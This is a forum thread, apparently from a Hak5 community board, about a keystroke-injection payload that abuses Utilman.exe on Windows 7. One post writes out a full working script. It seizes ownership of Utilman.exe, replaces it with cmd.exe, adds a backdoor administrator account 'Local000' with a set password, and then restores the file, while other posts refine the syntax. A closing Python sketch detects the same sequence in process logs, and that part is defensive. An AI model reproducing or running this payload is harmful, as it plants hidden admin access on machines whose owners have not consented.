[Payload] Utilman Exploit Payload


mackwage

I seem to have issues with the payload as is. The issue seems to be with the below lines:

MENU

STRING a

ENTER

I assume this is to right click on the CMD exe and run as administrator. However, it seems to right click within the text box of the start menu. Does anyone else have this issue?

Link to comment
Share on other sites

Minus the above thing, I had to change the syntax of some of the commands to get it to work on Windows 7... specifically the icacls, ren, rmdir commands. As it was, it would prompt for an answer to the ren and rmdir commands so I added the trigger to suppress those. Also, I had to change the icacls syntax to allow full control of Utilman.exe. Then I added a short delay after each GUI command.

DELAY 200

GUI r

DELAY 50

STRING cmd

DELAY 50

ENTER

DELAY 50

STRING takeown /f "%systemroot%\System32\Utilman.exe"

ENTER

DELAY 50

STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T

ENTER

DELAY 50

STRING cd %systemroot%\System32

ENTER

DELAY 50

STRING mkdir util

ENTER

STRING xcopy cmd.exe util\

ENTER

DELAY 50

STRING ren Utilman.exe Utilman.exe.bak

ENTER

DELAY 50

STRING cd /util

ENTER

DELAY 50

STRING ren cmd.exe Utilman.exe

ENTER

DELAY 50

STRING cd ..

ENTER

DELAY 50

STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\

ENTER

DELAY 50

STRING rmdir /s /q util

ENTER

DELAY 50

STRING exit

ENTER

DELAY 50

GUI u

STRING net user Local000 /add

ENTER

DELAY 50

STRING net localgroup administrators Local000 /add

ENTER

DELAY 50

STRING exit

ENTER

DELAY 50

GUI r

STRING cmd

ENTER

DELAY 50

STRING cd "%systemroot%\System32"

ENTER

DELAY 50

STRING delete Utilman.exe

ENTER

DELAY 50

STRING y

ENTER

DELAY 50

STRING ren Utilman.exe.bak Utilman.exe

ENTER

DELAY 50

STRING exit

ENTER

GUI r

DELAY 500

STRING cmd

DELAY 500

ENTER

DELAY 200

STRING net user Local000 *

ENTER

STRING hak5

ENTER

STRING hak5

ENTER

STRING exit

ENTER

Link to comment
Share on other sites

What version of Windows 7 did you run this on? I ran all the commands on Windows 7 Home Premium 64-Bit and they worked perfectly.

Also, you may find it easier to add the "DEFAULT_DELAY" command to the start of the script.

I will append those changes to the Wiki, as well.

Link to comment
Share on other sites

Thanks for the tip on the default delay.

I am using Win7 Ultimate x64. I manually walked through every step of the script and typed the commands in CMD to view their behavior.

icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T

This command didn't actually seem to change the permissions unless adding the "/grant administrators:F /T". I did some Google searching on the command to understand more about how it works, which led to me adding the last part.

STRING xcopy cmd.exe util\

I changed the syntax and added a backslash at the end. Without the backslash at the end, xcopy will prompt and ask if it's a file or a directory.

STRING cd /util

STRING ren cmd.exe Utilman.exe

STRING cd ..

I had trouble getting the rename command to interact correctly with the file unless that file was in my working directory.

STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\

I couldn't get xcopy to successfully copy from the util folder to the parent directory. I tried all sorts of variations and kept getting errors. So I just used the absolute path name instead.

STRING rmdir /s /q util

Without the /q trigger, rmdir will prompt you asking if you are sure you wish to delete it.

I'm also looking for the correct icacls command to change Utilman.exe back to the default permissions at the end of the script. Pwning the machine or not, I'd hate to leave it vulnerable for someone else to play with. :P

Link to comment
Share on other sites

  • 2 years later...

What is the purpose of all the utilman.exe machinations? Once you have the administrator mode cmd prompt, running the net user (create), net localgroup and net user (password) work directly. No footprints to clean up, and the same effect. The only use for utilman.exe I've found involves getting a cmd prompt with no logon at all, and your script presupposes a logged on user - with admin privs - that can do the three target commands in the first window.

Link to comment
Share on other sites
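
Seen from the defending side, the sequence discussed in this thread leaves a recognisable trail in process-creation logs; the sketch below is an added example, not part of any post above, that flags it. The record layout (parent image, image, command line), the function names and the sample events are assumptions constructed for illustration. Only external tools are matched, because ren, del and rmdir are cmd.exe built-ins and start no process of their own.

```python
import re

# Constructed process-creation records: (parent image, image, command line),
# shaped like what command-line process auditing would capture.
SAMPLE_EVENTS = [
    ("cmd.exe", "takeown.exe", r'takeown /f "C:\Windows\System32\Utilman.exe"'),
    ("cmd.exe", "icacls.exe",
     r'icacls "C:\Windows\System32\Utilman.exe" /grant administrators:F /T'),
    ("cmd.exe", "xcopy.exe",
     r"xcopy C:\Windows\System32\util\Utilman.exe C:\Windows\System32"),
    ("Utilman.exe", "net.exe", "net user Local000 /add"),
    ("Utilman.exe", "net.exe", "net localgroup administrators Local000 /add"),
    ("cmd.exe", "icacls.exe", r'icacls "C:\Users\bob\report.docx" /grant bob:F'),
    ("explorer.exe", "notepad.exe", "notepad.exe notes.txt"),
]

UTILMAN = re.compile(r"utilman\.exe", re.IGNORECASE)
ACL_TOOLS = {"takeown.exe", "icacls.exe"}
COPY_TOOLS = {"xcopy.exe", "robocopy.exe"}
ACCOUNT_TOOLS = {"net.exe", "net1.exe"}


def classify(parent, image, cmdline):
    """Return a finding string, or None when the event is not relevant."""
    parent_l, image_l = parent.lower(), image.lower()
    touches_utilman = bool(UTILMAN.search(cmdline))
    if image_l in ACL_TOOLS and touches_utilman:
        return "ownership/ACL change on Utilman.exe"
    if image_l in COPY_TOOLS and touches_utilman:
        return "file copy involving Utilman.exe"
    # The real Utilman.exe has no reason to start account-management tools.
    if parent_l == "utilman.exe" and image_l in ACCOUNT_TOOLS:
        return "account command spawned from Utilman.exe"
    return None


def scan(events):
    """Return (index, finding) for every event that matches a rule."""
    return [(i, f) for i, ev in enumerate(events) if (f := classify(*ev))]


if __name__ == "__main__":
    for index, finding in scan(SAMPLE_EVENTS):
        print(index, finding, "|", SAMPLE_EVENTS[index][2])
```
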
